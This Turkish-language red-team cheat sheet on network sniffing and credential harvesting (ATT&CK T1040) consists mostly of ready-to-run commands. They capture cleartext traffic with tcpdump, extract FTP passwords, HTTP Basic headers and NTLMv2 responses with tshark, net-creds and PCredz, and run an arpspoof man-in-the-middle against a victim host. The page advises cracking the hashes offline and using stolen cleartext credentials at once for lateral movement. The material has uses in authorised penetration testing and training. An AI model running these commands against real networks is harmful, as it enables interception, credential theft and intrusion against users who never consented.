Skip to content

Trafik Dinleme & Kimlik Toplama

ATT&CK T1040 difficulty: kolay

Ağ trafiğini dinlemek; açık (şifresiz) protokollerden kimlik bilgisi toplamanın ve ortamı anlamanın hızlı bir yoludur (T1040). Switch’li ağda pasif dinleme yalnızca kendi/broadcast trafiğini görür; başkalarının unicast’ine erişmek için port mirroring, TAP veya MITM gerekir.

- Promiscuous mode destekli arayüz (sudo)
- Hedef segmentte konum veya ARP spoof izni
- Araçlar: tcpdump, tshark, Wireshark, net-creds, PCredz, bettercap
Terminal window
sudo tcpdump -i eth0 -w capture.pcap
Terminal window
sudo tcpdump -i eth0 -G 3600 -W 5 -w hour.pcap
Terminal window
sudo tcpdump -i eth0 -w clear.pcap \
'port 21 or port 23 or port 80 or port 110 or port 143 or port 161'
Terminal window
sudo tcpdump -i eth0 -w host.pcap host 10.10.10.5
Terminal window
sudo tcpdump -i eth0 -nn port 5355 or port 137 or port 5353
Terminal window
sudo net-creds -i eth0
Terminal window
sudo python3 PCredz -i eth0
Terminal window
sudo python3 PCredz -f capture.pcap
Terminal window
sudo bettercap -iface eth0
Terminal window
> net.sniff on
Terminal window
pktmon
FTP (21) USER/PASS
Telnet (23) düz metin oturum
HTTP Basic Authorization: Basic base64
HTTP form POST password= (HTTPS değilse)
POP3 (110) / IMAP (143) LOGIN
SMTP AUTH AUTH PLAIN / LOGIN
SNMP (161) community string
LDAP simple bind düz metin DN + password
LLMNR/NBNS NTLM challenge/response (Responder ile aktif)
Kerberos AS-REQ (pre-auth offline — nadiren pratik)
Terminal window
sudo python3 PCredz -f capture.pcap
Terminal window
tshark -r capture.pcap -Y 'ftp.request.command == "PASS"' -T fields -e ftp.request.arg
Terminal window
tshark -r capture.pcap -Y 'http.authorization' -T fields -e http.authorization
Terminal window
tshark -r capture.pcap -Y 'ntlmssp.auth.username' -T fields \
-e ntlmssp.auth.username -e ntlmssp.ntlmv2_response
  1. Protokole göre filtrele — http.authorization , ftp.request.command == “PASS” , telnet , ntlmssp , kerberos.CNameString , ldap.simpleBind .

  2. Akışı takip et — Follow → TCP Stream / UDP Stream ile oturum içeriğini oku; dosya aktarımlarını Export Objects ile çıkar.

  3. Kimlik ve hash çıkar — NetNTLM hash’leri parola saldırıları ile offline kır; cleartext’i hemen yanal harekette kullan.

  4. Ortam istihbaratı — DNS sorguları, SMB tree connect yolları, User-Agent, iç hostname’ler, domain adı.

Terminal window
tshark -r capture.pcap -q -z credentials
Terminal window
tshark -r capture.pcap -Y 'dns.qry.name' -T fields -e dns.qry.name | sort -u
Terminal window
tshark -r capture.pcap -Y 'smb2' -T fields -e ip.src -e smb2.filename | head
Terminal window
wireshark capture.pcap
Terminal window
sudo sysctl -w net.ipv4.ip_forward=1
Terminal window
sudo arpspoof -i eth0 -t 10.10.10.5 -r 10.10.10.1 &
Terminal window
sudo tcpdump -i eth0 -w spoofed.pcap host 10.10.10.5

tcpdump · capture

embedded tool
Generated command
sudo tcpdump -i eth0 -w capture.pcap tcp port 21 or tcp port 23
Misafir portu / hub / SPAN
→ tcpdump + PCredz
→ SNMP community + FTP pass
→ iç panel login / SSH
ARP spoof
→ HTTP Basic + NetNTLMv2
→ hashcat 5600 / relay